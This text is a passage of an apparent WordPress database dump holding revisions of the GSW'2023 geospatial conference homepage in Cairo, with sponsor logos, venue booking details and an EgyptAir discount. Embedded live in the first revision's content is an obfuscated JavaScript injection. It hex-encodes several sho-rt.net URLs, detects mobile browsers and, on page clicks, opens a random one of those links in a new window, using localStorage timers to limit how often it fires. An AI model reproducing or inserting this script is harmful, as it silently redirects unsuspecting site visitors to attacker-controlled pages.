link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-11 13:14:38','2023-07-11 13:14:38','',3066,'https://gsw2023.com/?p=5006',0,'revision','',0),
(5007,1,'2023-07-11 13:15:40','2023-07-11 13:15:40','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081246466{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><img class=\"wp-image-5005 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button 